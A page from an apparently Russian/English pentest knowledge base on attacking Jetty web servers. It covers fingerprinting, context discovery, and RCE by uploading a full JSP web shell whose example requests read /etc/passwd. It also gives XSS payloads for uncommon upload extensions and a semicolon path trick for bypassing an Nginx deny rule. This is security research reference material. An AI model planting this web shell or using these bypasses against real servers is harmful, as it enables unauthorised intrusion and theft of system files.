✨
AppSec & Pentest
AppSec
AppSec
  • AppSec Book
  • Intro
  • PII: Персональные данные
  • Поисковые движки
  • Построение модели угроз / анализ угроз
  • Платформы оркестрации, автоматизации пентеста
  • Audit and Compliance
  • Methodologies
    • Security Check Lists
    • Security Cheat Sheets
    • MNA Process
    • DD Process
    • Написание политик
    • Какие-то модные прикладные инструменты
    • Pentest
      • BlackBox vs GreyBox vs WhiteBox
      • Threat Modeling
      • MITRE ATT&CK
      • OSSTMM
      • CVSS
      • CIS Standarts
      • WASC
      • OWASP Testing Guides
      • PCI DSS
      • PTES
      • NIST SP 800-115
      • ISSAF
  • peoples & blogs
    • Intro
    • Companies
    • Mobile
    • People & Gitbooks
    • Podcasts
    • Jobs
  • Базы уязвимостей
    • vulners
    • zero.today
    • Регистрация CVE
  • Pentest IDE
    • Nuclei (Go)
    • jaeles (Go)
    • Pentest Collaboration Framework
    • Lair Framework (Go)
    • Faraday IDE
    • Nucleus
    • Bulwark
    • Написание отчетов
  • Payloads & Wordlists
    • Генерация wordlists
    • Payloads
      • Подборка
      • Directories
      • Passwords
      • Поддомены
      • Пароли по умолчанию
      • usernames & logins
      • Headers
      • RCE
      • XXE
      • XXS
      • JWT Secrets
    • Расширения файлов, которые можно искать
    • Bypass Something
      • bypass dot
      • 40x bypass
  • AppSec / WEB
    • Common
      • Типовая последовательность действий
      • Common Go Tools
      • Guidelines
    • Automated WebApp Pentest
      • Other tools
      • Burp Suite
        • Режимы в Intruder
        • Как заводить крякнутый
        • Plugins
        • Инструменты для Burp
        • Написание расширений
          • Documentation & Examples
          • UI
          • kotlin
            • Basic
            • Examples
          • jpython
            • Пример
        • Papers
        • Tips
    • Server-Side Vulnerabilities
      • Broken Access Control
      • Bruteforce [credentials]
        • About
        • Papers & Books
        • Tools
          • Hydra
          • Medusa
          • Potator
      • Business Logic Vuln
      • CSV-injection
      • DOS
      • DDOS
      • Dependency Confusion Attack
      • Deserialization
        • About
        • JSON
        • Java
        • .Net / ViewState
        • PHP
        • Python
        • Ruby
        • Тестовые стенды
      • Host Header Injection
      • HTTP Smuggling
      • IDOR
      • JSON Hijacking
      • LFI
      • LFR
      • Open Redirect
        • Cases
          • Open Redirect To XSS
        • CheetSheets
      • OS Command Injection
      • Path Traversal
      • Phishing
      • Race Condition
      • Regular Expression
      • Reverse Shell
      • Searching
      • Session Fixation
      • SQLi
        • Description
        • Databases
          • HQL inj
          • DQL inj
          • postgres
          • Yandex ClickHouse
        • Exec Code
        • Tools
          • Как отработает запрос в разных базах
          • sqli exploit
        • Papers
          • SQLi in Node.js
          • Cheat Sheets
      • SSRF
        • Description
        • Tools
        • Papers
      • SSTI/CSTI
      • Subdomain Takeover
        • Description
        • Tools
        • Papers
      • Upload File
        • MIME type bypass & filter evasions
        • Example: Upload File
        • Some Attacks
        • ImageMagick
        • Inject Payloads
          • To Image
          • WebShell
          • In office macros
          • Контейнеры
            • png
          • XXE/XXS -> Office
        • Tools & MindMaps
      • XML/SOAP injection/XXE
        • About
        • Tools
        • Examples XXE
        • Papers
      • Web Cache Deception
      • Web Cache Poising
    • Client-Side Vulnerabilities
      • Vulnerabilities
      • CSRF
      • CRLF
      • XSS
        • Description
        • Attacks
          • Exploiting XSS
          • GTM (and other TMS) XSS
          • Через SVG
          • DOM-based vulnerabilities
            • About
            • DOM-based XSS
            • DOM-based open redirect
            • DOM Clobbering
          • Local File Read via HTML injection in PDF
          • RCE in DOMPDF
          • [висячая разметка] Dangling markup injection
          • String.prototype.replace
          • CSS injection
          • jQuery XSS
          • AngularJS Sandbox Escape
        • Gadgets
        • Tools
        • Cheat Sheets
        • Papers
      • Prototype Pollution Attack
      • Client-Side & Client-Server Communications
        • window.postMessage
        • Server-Sent Event (SSE)
      • Eval-based Injections
      • Serialization
      • Incorrect work with location
      • Clickjacking (UI redressing)
    • Technics
      • OSINT
        • Tools
          • Поиск по сервисам
            • Github
            • Gitlab
            • Slack
            • Google Dorks
            • Facebook / Instagram
            • LinkedIn
          • Swiss Army Knife
            • Bellingcat's Online Investigation Toolkit
            • MS Threat Intelligence Platform
            • foca/goca
            • spiderfoot
            • Shodan
            • BinaryEdge (Shodan alternative)
            • Maltego
            • theharvester
            • PublicWWW
            • Разное / TODO
          • Поиск по логину / имени/компании
          • Get IP or Geo-location
          • Разное
            • База CommonCrawl
            • ТОП сайтов
        • Certificate Transparency
        • Papers
      • Кодировки
      • Web Application Testing with CryptoPro Sign
      • Получить IP спрятанный за CDN (Search Real IP)
    • SSDLC
    • DevSecOps
      • Materials
      • IAST
      • SAST
        • About
        • SAST List
        • Python: Bandit
        • Semgrep
          • Intro
          • Getting Started
          • Writing rules
            • Pattern syntax
            • Rule syntax
          • Rulesets
          • Papers
        • CodeQL
          • Intro
          • Docs & Papers
          • Get Started
          • Usage
          • CodeQL CLI
          • Writing CodeQL queries
            • About
            • CodeQL Packs
            • CodeQL Queries
            • QL Language
              • About
              • Predicates
              • Queries
              • Types
            • Libraries
              • Intro
              • Javascript
            • Basic types
            • Creating alert queries
            • Creating path queries
          • TODO
        • Checkmarx
      • DAST
        • About
        • NetSparker
        • Rapid7
        • Acunetix
        • OWASP ZAP
        • HP WebInspect
        • Burp Enterprise
        • Wallarm FAST
      • RASP
      • API ST
      • OSA/SCA — Open Source Scanners & Dependency Check
    • Browser PWN
    • Вопросы
      • Как хранить пароли?
      • Куки или токены?
      • Сброс пароля через email
      • Про процессы и контроли
      • Application Security Design Antipatterns
    • ЯП
      • JS
        • Search links
        • RCE on Desktop Clients (ex: win)
        • Обход валидаторов
    • Books & Papers
    • Tools
      • Crawling
      • CSP bypass
      • Web Fuzzers
        • Intro
        • Tools
          • Other tools
          • ffuf (Go)
          • wfuzz
      • Subdomain Enum
        • Combines
          • Amass
          • Monitorizer
          • Findomain
          • dnsdumpster
        • Another tools
        • Brute subdomains
        • Sources
        • Mutators
        • Techniques
      • Other tools
      • Scanners
      • Fingerprinting
      • Scrappers
      • CVEs List
  • Technologies
    • WEB
      • Аналитика & Маркетинг
        • Dark
        • Dark SEO
        • Просто список
      • RSS-каналы
        • Клиенты
        • Atom
      • CMIS
        • About
      • HTTP/WEB
        • Рекомендуемые заголовки (Headers)
        • HSTS
        • SameSite
        • Content-Security-Policy (CSP)
        • Same-Origin Policy (SOP)
        • Cross-Origin Resource Sharing (CORS)
        • Типы запросов
        • First Party Sets
        • Subresource Integrity (SRI)
        • HTTP Reverse Proxy
        • Papers & Resources
      • CMS
        • ModX
        • Joomla
        • Drupal
        • WordPress
        • Liferay
      • Админки/CRM
        • Zend Framework
        • Bitrix
        • Salesforce
      • WAF
      • GraphQL
      • Virtual Hosts
      • OAUTH/OpenID/2FA
        • Общие рекомендации для авторизации
        • 2FA
        • OAuth 2.0
          • About
          • Definitions
            • Clients
            • Tokens
            • Scopes
            • Grant Types
            • Redirect URL
            • The Resourse Server
          • Flows
            • Server Side App Authorization Flow
            • Single Page App Auhtorization Flow
            • Mobile and Native Apps Authorization Flow
            • Authorization Flow
            • Access Tokens Flow
              • Authorization Code Request
              • Password Grant
              • Client Credentials
              • Access Token Reponse
              • Access Token Lifetime
              • Refreshing Access Tokens
              • Making Authenticated Requests
            • Listing Authorizations and Revoking Access Flow
            • OAuth for Browserless and Input Constrained Devices
            • PKCE
            • Token Introspection Server Flow
          • Vulnerabilities
            • Common 1
            • Common 2
        • OpenID Connect (OIDC)
          • About
          • Vulnerabilities
          • Papers
        • IndieAuth
        • Разница между OAuth и OpenID
        • JWT
      • Servers
        • Oracle WebLogic
        • Jetty
        • JBoss (WildFly)
        • Nginx
        • Apache
          • .htaccess
          • <server-url>/server-status
          • Apache Tomcat
          • Apache Struts2
          • CVE
        • F5 BIG-IP
    • Покупка SIM-карт и номеров
    • Banks & Payments
      • Definitions
      • Kind of payments
      • 3DS
      • PCI DSS
      • Эквайринг
      • Vulnerabilities
      • Доклады
      • ATM
    • Программы лояльности
    • Digital Rights Management (DRM)
    • ELK — Elasticsearch, Logstash, Kibana
      • About
      • Elasticsearch
      • Logstash
      • Kibana
    • 1C
    • CI/CD
      • Jenkins
      • huskyCI
      • Travis CI
      • CircleCI
      • Общее
    • SCM
      • Gitlab
      • Tools
      • Vulns
    • Honeypots
    • ChatGPT
  • Learning
    • Компетенции
    • Материалы SANS & Offensive Security
    • Просто норм материалы/gitbooks по пентесту вцелом...
    • Platforms & Playground Labs
    • Бумажная ИБ
      • Информация Общая
      • Иерархия (виды) информации
  • Bug Bounty
    • Notes
    • Browser Plugins
    • Cheat Sheets
    • Платформы
    • Specific tools
  • Hardware/IoT
    • Tools
    • Training
    • Papers & Books
Powered by GitBook
On this page
  • Detect
  • Jetty Overview
  • Discovering contexts
  • RCE via File Upload
  • Web application upload
  • XSS via file upload
  • Bypass WAF or filters
  • Case 1
  • Papers & Notes

Was this helpful?

  1. Technologies
  2. WEB
  3. Servers

Jetty

Detect

Jetty не реагирует на ;":

/;" or /existingUrl;"/

Nginx:  GET /;" -> 404 Not Found
Apache: GET /;" -> 404 Not Found
Jetty:  GET /;" -> 200 OK

Jetty Overview

Variables:

$JETTY_HOME — jetty distribution directory

$JETTY_BASE — which contains configuration files, web applications, etc. $JETTY_BASE is ./ in relation to a process run by Jetty server

All web applications are stored $JETTY_BASE/webapps/

When applications are deployed, they are each assigned their own context. Every context has the contextPath property that defines the URL path served by the associated application. If an application has the contextPath “/test” , it will process all HTTP requests to /test/*. Using contextPath and virtualHost, we can map different paths and virtual hosts to different applications.

Jetty can have a root web application (catch-all context) located in $JETTY_BASE/webapps/root/ that processes all requests to /. In addition to /, this application will process all requests for a resource that is not associated with any registered contexts.

Discovering contexts

У Jetty есть одна интересная особенность. Если нет приложения, отвечающего за root-контекст, то при обращении на несуществующий виртуальный хост будут выданы пути до всех контекстов.

GET / HTTP/1.1
Host: randomHost-sjdnvjks

RCE via File Upload

JSP Servlets

By default, JSP files are processed in Jetty by org.eclipse.jetty.jsp.JettyJspServlet. This is configured in $JETTY_HOME/etc/webdefault.xml. Another default setting makes Jetty compile and execute all files matching the following masks:

  • *.jsp

  • *.jspf

  • *.jspx

  • *.xsp

  • *.JSP

  • *.JSPF

  • *.JSPX

  • *.XSP

To achieve RCE, we need to upload a file with one of these extensions to the server.

Note: to enable JSP file processing in Jetty, the jsp module must be enabled.

Case 1

As I mentioned earlier, Jetty may have a root application that processes requests to the server root. Therefore, the easiest way to achieve RCE is to upload a JSP web shell to $JETTY_BASE/webapps/root/ and then access it via HTTP.

GET /exec.jsp?cmd=cat+/etc/passwd HTTP/1.1
Host: jetty
// $JETTY_BASE/webapps/root/exec.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
   Process.p;
   p = Runtime.getRuntime().exec(request.getParameter("cmd"));
   InputStream in = p.getInputStream();
   DataInputStream dis = new DataInputStream(in);
   String disr = dis.readLine();
   while ( disr != null ) {
      out.println(disr);
      disr = dis.readLine();
   }
}
%>

Case 2

A JSP shell can also be uploaded to $JETTY_BASE/work/ which is normally used as a parent directory for all temporary folders of web applications. When the web server starts, directories for each application will be created in it. The name of the directory will be in the format:

"jetty-"+host+"-"+port+"-"+resourceBase+"-_"+context+"-"+virtualhost+"-"

If we somehow manage to find out what temporary directory has been created, we can try to upload a JSP shell via: $JETTY_BASE/work/"jetty-"+host+"-"+port+"-"+resourceBase+"-_"+context+"-"+virtualhost+"-"/webapps

Next we open the URL with the required context in our browser and we have RCE.

GET /testApp/exec.jsp?cmd=cat+/etc/passwd HTTP/1.1
Host: 192.168.99.129

File in:

work/jetty-0_0_0_0-8080-test_war-_testApp-any-/webapp/exec.jsp

Web application upload

If uploading JSP files is impossible or the JSP handler is not enabled, we can use the automatic deploy (hot deploy) feature that is enabled in Jetty by default. When hot deploy is enabled, $JETTY_BASE/webapps/ is constantly scanned for new web applications that are automatically deployed without us having to restart the Jetty server.

А web application in Jetty can be any of the following:

  • A regular directory

  • A WAR file

  • An XML file (Jetty context XML file)

This means we have two file types that can give us RCE if we upload them to the server.

XSS via file upload

We can achieve XSS on a Jetty server with standard configuration by uploading not only well-known .html or .svg files, but also other files with less popular extensions. To test this, I used two types of payload:

<!-- XML-based: -->
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert('XSS')</script>

<!-- HTML-based: -->
<script>alert('XSS')</script>
Extension
Payload
Browser

.htm

HTML

.mathml

XML

.rdf

XML

.svgz

XML

.xht

XML

.xhtml

XML

.xml

XML

.xsd

XML

.xsl

XML

.[randomSymbols]

HTML

Bypass WAF or filters

With a thorough understanding of Jetty’s inner workings, we can find ways to exploit vulnerabilities in applications running on it even if those vulnerabilities are compensated by a WAF.

Case 1

Knowing how the Jetty server parses URL addresses, we can bypass filters on a proxy server. Imagine that a Jetty server is deployed behind an NGINX proxy with a rule that blocks requests to /adminURL/*.

location ~ /adminURL/ {
   deny all;
}
location / {
   proxy_pass http://localhost:8080;
   proxy_set_header Host $host;
   proxy_set_header X-Real-IP $remote_addr;
}

If this rule is configured only on the proxy, we can send an HTTP request to /adminURL;random/ and obtain access to the protected resource on the server:

/adminURL/ -> 403
/adminURL;aaa/ -> 200

Больше примеров в статье

Papers & Notes

PreviousOracle WebLogicNextJBoss (WildFly)

Last updated 2 years ago

Was this helpful?

The results are in the table below. ( of extensions)

PT Swarm Research:

Tomcat has the same feature but it is disabled by default
List
https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/